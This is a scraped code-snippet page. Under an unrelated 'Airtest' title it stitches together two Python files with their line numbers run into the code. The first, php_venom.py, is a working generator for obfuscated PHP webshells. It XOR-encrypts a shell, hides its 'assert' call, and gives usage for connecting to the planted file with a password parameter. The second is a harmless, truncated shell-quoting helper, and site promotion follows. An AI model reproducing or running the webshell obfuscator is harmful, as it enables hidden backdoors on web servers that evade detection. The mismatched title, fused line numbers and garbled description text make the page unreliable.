Best Python code snippet using Airtest
php_venom.py
Source:php_venom.py
1import random2import base643import argparse4func = 'assert'5shell_tpl = '''<?php 6class {0}{2}7${1}=new {0}();8@${1}->ccc=xor_enc(base64_decode('ddd'), $_REQUEST['strpwd']);9'''10php_xor_func = '''11function xor_enc($str,$key)12{13 $crytxt = '';14 $keylen = strlen($key);15 for($i=0;$i<strlen($str);$i++)16 { 17 $k = $i%$keylen;18 $crytxt .= $str[$i] ^ $key[$k];19 }20 return $crytxt;21}22?>23'''24def xor_enc(text, password):25 pwdLen = len(password)26 textLen = len(text)27 key = textLen // pwdLen*password+password[:textLen % pwdLen]28 enc_list = []29 for i in range(len(key)):30 textBytes = bytes(key, "utf8")[i] ^ bytes(text, "utf8")[i]31 enc_list.append(bytes(chr(textBytes), encoding='utf8'))32 enc_data = b''.join(enc_list)33 return enc_data34def encrypt_shell(raw_shell, password):35 tag_start = raw_shell.find('<?php') + 536 tag_end = raw_shell.rfind('?>', raw_shell.rfind(';'))37 raw_shell = raw_shell[tag_start:tag_end] if tag_end != -1 else raw_shell[tag_start:]38 raw_shell = raw_shell.replace('\\', '\\\\').replace('\'', '\\\'')39 taoke = "eval('{}')".format(raw_shell)40 return base64.b64encode(xor_enc(taoke, password)).decode('utf8')41def random_keys(len):42 str = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'43 return ''.join(random.sample(str, len))44def random_name(len):45 str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'46 return ''.join(random.sample(str, len))47def xor(c1, c2):48 return hex(ord(c1) ^ ord(c2)).replace('0x', r"\x")49def build_func():50 func_line = ''51 name_tmp = []52 for i in range(len(func)):53 name_tmp.append(random_name(3).lower())54 key = random_keys(len(func))55 fina = random_name(4)56 call = '${0}='.format(fina)57 for i in range(0, len(func)):58 enc = xor(func[i], key[i])59 func_line += "${0}='{1}'^\"{2}\";".format(name_tmp[i], key[i], enc)60 func_line += '\n'61 call += '${0}.'.format(name_tmp[i])62 func_line = func_line.rstrip('\n')63 # print(func_line)64 call = call.rstrip('.') + ';'65 func_tmpl = '''{ 66function __destruct(){67%s68%s69return @$%s("$this->ccc");}}''' % (func_line, call, fina)70 return func_tmpl71def build_webshell(raw_shell, password):72 className = random_name(4)73 objName = className.lower()74 func = build_func()75 shellc = shell_tpl.format(className, objName, func).replace(76 'ccc', random_name(2))77 shellc = shellc.replace('ddd', encrypt_shell(raw_shell, password))78 shellc += php_xor_func79 return shellc80if __name__ == '__main__':81 help_msg = '''82Usage: python3 php_venom.py -f shell.php -o bypass_shell.php -p mypass83Connect: http://xxx.com/bypass_shell.php?strpwd=mypass84 '''85 parser = argparse.ArgumentParser(description='å
æä¸å
å«å
èHTMLçphpèæ¬ï¼ä»
对php7.1以ä¸çæ¬ææï¼ä¸å
å«7.1çæ¬ï¼' +86 help_msg, formatter_class=argparse.RawDescriptionHelpFormatter)87 parser.add_argument('-f', '--file', help='php file needs to bypass.')88 parser.add_argument('-o', '--outfile', help='output file.')89 parser.add_argument('-p', '--password',90 help='password for encrypting shell')91 args = parser.parse_args()92 import sys93 if len(sys.argv) < 2:94 # print(help_msg)95 parser.print_help()96 sys.exit(1)97 with open(args.file, 'r', encoding='utf8') as f:98 raw_shell = f.read()99 with open(args.outfile, 'w', encoding='utf8') as f:...
shell_quoting.py
Source:shell_quoting.py
...20 '''21 Wrap a string with this to make it transparent to shell_quote(). It22 will almost always suffice to use ShellQuoted.format(), path_join(),23 or shell_join().24 If you really must, use raw_shell() to access the raw string.25 '''26 def __new__(cls, s):27 'No need to nest ShellQuoted.'28 return super(ShellQuoted, cls).__new__(29 cls, s.do_not_use_raw_str if isinstance(s, ShellQuoted) else s30 )31 def __str__(self):32 raise RuntimeError(33 'One does not simply convert {0} to a string -- use path_join() '34 'or ShellQuoted.format() instead'.format(repr(self))35 )36 def __repr__(self):37 return '{0}({1})'.format(38 self.__class__.__name__, repr(self.do_not_use_raw_str)39 )40 def format(self, **kwargs):41 '''42 Use instead of str.format() when the arguments are either43 `ShellQuoted()` or raw strings needing to be `shell_quote()`d.44 Positional args are deliberately not supported since they are more45 error-prone.46 '''47 return ShellQuoted(self.do_not_use_raw_str.format(**dict(48 (k, shell_quote(v).do_not_use_raw_str) for k, v in kwargs.items()49 )))50def shell_quote(s):51 'Quotes a string if it is not already quoted'52 return s if isinstance(s, ShellQuoted) \53 else ShellQuoted("'" + str(s).replace("'", "'\\''") + "'")54def raw_shell(s):55 'Not a member of ShellQuoted so we get a useful error for raw strings'56 if isinstance(s, ShellQuoted):57 return s.do_not_use_raw_str58 raise RuntimeError('{0} should have been ShellQuoted'.format(s))59def shell_join(delim, it):60 'Joins an iterable of ShellQuoted with a delimiter between each two'61 return ShellQuoted(delim.join(raw_shell(s) for s in it))62def path_join(*args):63 'Joins ShellQuoted and raw pieces of paths to make a shell-quoted path'64 return ShellQuoted(os.path.join(*[65 raw_shell(shell_quote(s)) for s in args66 ]))67def shell_comment(c):68 'Do not shell-escape raw strings in comments, but do handle line breaks.'69 return ShellQuoted('# {c}').format(c=ShellQuoted(70 (raw_shell(c) if isinstance(c, ShellQuoted) else c)71 .replace('\n', '\n# ')...
Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!